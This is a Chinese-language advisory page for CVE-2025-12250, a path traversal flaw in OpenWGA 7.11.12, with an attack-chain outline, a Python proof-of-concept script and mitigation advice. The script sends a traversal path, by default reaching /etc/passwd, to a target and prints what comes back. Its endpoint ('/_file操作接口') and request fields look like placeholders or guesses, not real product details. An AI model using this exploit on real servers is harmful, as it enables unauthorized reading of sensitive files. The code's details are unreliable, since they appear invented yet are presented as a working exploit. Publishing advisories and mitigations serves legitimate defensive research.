OpenWGA 7.11.12路径遍历漏洞 (CVE-2025-12250)

漏洞信息

漏洞编号

CVE-2025-12250

漏洞类型

路径遍历

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

OpenWGA

漏洞概述

CVE-2025-12250是OpenWGA 7.11.12 Build 737版本中的一个路径遍历（Path Traversal）漏洞。该漏洞存在于WGA.File组件的TMLScript API中，攻击者可以通过构造特殊的文件操作请求来访问服务器上的敏感文件或目录。由于该漏洞的攻击复杂度较低且可远程利用，对使用该版本OpenWGA的组织构成了一定的安全风险。漏洞发现者已向厂商报告但未获得回应， exploit已公开利用可能。

技术细节

该路径遍历漏洞源于OpenWGA的WGA.File组件在处理文件路径时未充分验证用户输入。攻击者可以通过在文件路径中插入../等目录遍历序列来跳出预期目录，访问系统敏感文件。漏洞位于TMLScript API的文件操作功能中，攻击者需要具备高权限账户才能利用此漏洞。成功利用后可读取、修改或删除服务器上的任意文件，包括配置文件、源代码和其他敏感数据。CVSS向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），但机密性、完整性和可用性影响均为低级别（C:L/I:L/A:L）。

攻击链分析

STEP 1

步骤1

攻击者识别目标OpenWGA服务器版本为7.11.12 Build 737

STEP 2

步骤2

攻击者获取高权限账户访问权限（该漏洞需要PR:H权限）

STEP 3

步骤3

构造包含路径遍历序列（如../）的恶意文件路径请求

STEP 4

步骤4

通过WGA.File组件的TMLScript API发送恶意请求

STEP 5

步骤5

服务器解析路径时未正确验证，攻击者成功访问预期目录外的敏感文件

STEP 6

步骤6

攻击者获取敏感数据（如系统配置文件、密码文件等），可能导致进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12250 PoC - OpenWGA Path Traversal
# Target: OpenWGA 7.11.12 Build 737
# Component: WGA.File (TMLScript API)

import requests
import sys

def exploit_cve_2025_12250(target_url, file_path="../../../../etc/passwd"):
    """
    Exploit for OpenWGA path traversal vulnerability
    """
    # Construct malicious file path with directory traversal
    payload = file_path
    
    # Target endpoint for WGA.File TMLScript API
    endpoint = f"{target_url}/_file操作接口"
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    
    # TMLScript API request payload
    data = {
        "action": "read",
        "path": payload,
        "component": "WGA.File"
    }
    
    try:
        response = requests.post(endpoint, data=data, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request successful!")
            print(f"[+] File content:\n{response.text}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12250.py <target_url> [file_path]")
        sys.exit(1)
    
    target = sys.argv[1]
    path = sys.argv[2] if len(sys.argv) > 2 else "../../../../etc/passwd"
    exploit_cve_2025_12250(target, path)

影响范围

OpenWGA 7.11.12 Build 737

防御指南

临时缓解措施

由于厂商未回应，建议采取以下临时措施：1）限制对OpenWGA管理界面的访问，仅允许受信任的IP地址；2）使用Web应用防火墙规则阻止包含路径遍历特征的请求；3）定期审计日志文件，检测异常的文件访问行为；4）考虑使用文件完整性监控工具监控关键系统文件；5）评估是否可以使用反向代理限制对TMLScript API的直接访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12250
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12250
3 Details https://www.cvedetails.com/cve/CVE-2025-12250/
4 VulDB https://vuldb.com/cve/CVE-2025-12250
5 Link https://github.com/mikecole-mg/security_findings/blob/main/openwga/openwga-rce.md
6 Link https://vuldb.com/?ctiid.329921
7 Link https://vuldb.com/?id.329921
8 Link https://vuldb.com/?submit.673917